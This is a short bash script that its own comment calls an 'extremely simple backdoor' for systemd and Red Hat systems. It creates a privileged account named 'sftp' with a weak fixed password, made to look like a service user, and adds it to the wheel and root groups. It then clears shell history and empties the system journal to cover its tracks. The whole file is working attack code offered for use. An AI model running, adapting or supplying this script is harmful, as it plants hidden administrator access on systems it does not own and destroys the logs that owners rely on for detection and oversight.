#!/bin/bash
#extremely simple backdoor, expected to work on systemd/redhat-distros, can be found with a simple look into /etc/passwd file
#change these to anything you want, to be "disguised" as a service user
USER="sftp" 
GROUP="sftp"
PASSWORD="1337"
useradd -g $GROUP -G wheel,root $USER
echo $PASSWORD | passwd --stdin $USER
echo "done!"
history -c
journalctl --rotate
journalctl --vacuum-size=1B